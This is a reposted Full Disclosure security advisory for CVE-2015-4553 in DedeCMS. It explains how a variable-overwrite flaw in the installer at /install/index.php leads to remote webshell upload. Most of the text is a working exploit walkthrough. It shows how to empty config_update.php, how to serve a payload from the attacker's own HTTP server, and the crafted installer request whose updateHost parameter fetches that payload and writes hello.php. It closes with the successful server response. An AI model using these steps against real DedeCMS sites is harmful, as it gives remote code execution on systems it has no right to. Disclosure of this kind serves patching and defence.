[FD] [CVE-2015-4553]Dedecms variable coverage leads to getshell

[CVE-2015-4553]Dedecms variable coverage leads to getshell ############################################################################# # # DBAPPSECURITY LIMITED http://ift.tt/1QJxXMS # ############################################################################# # # CVE ID: CVE-2015-4553 # Subject: Dedecms variable coverage leads to getshell # Author: zise # Date: 06.17.2015 ############################################################################# Introduction: ======== dedecms Open source cms Extensive application Influence version Newest dedecms 5.7-sp1 and all old version Remote getshell Details: ======= After the default installation of dedecms Installation directory /install/index.php or /install/index.php.bak /install/index.php //run iis apache exploit /install/index.php.bak //run apache exploit Step 1 ############################################################################# Clear file contents config_update.php ====File content==== [×] 远程获取失败 ### ###After execution file 0 byte ~ho~year~#### 2015/06/17 14:55 0 config_update.php 1 file 0 byte Step 2 ############################################################################# Create local HTTP services zise:tmp zise$ ifconfig en0 en0: flags=8863 mtu 1500 inet 119.253.3.18 netmask 0xffffff00 broadcast zise:tmp zise$ mkdir "dedecms" zise:tmp zise$ cd dedecms/ zise:dedecms zise$ echo "" > demodata.a.txt zise:dedecms zise$ cd ../ zise:tmp zise$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 - #### http://ift.tt/1Bo74MC ?step=11 &insLockfile=a &s_lang=a &install_demo_name=hello.php &updateHost=http://ift.tt/1d20hwy #### HTTP/1.1 200 OK Date: Wed, 17 Jun 2015 07:11:18 GMT Server: Apache/2.4.12 X-Powered-By: PHP/5.6.6 Vary: Accept-Encoding,User-Agent Content-Length: 81 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [√] 存在(您可以选择安装进行体验) Attack complete you webshell http://ift.tt/1Bo76UP ====================== zise ^_^ zise.shi@dbappsecurity.com.cn Security researcher

Source: Gmail -> IFTTT-> Blogger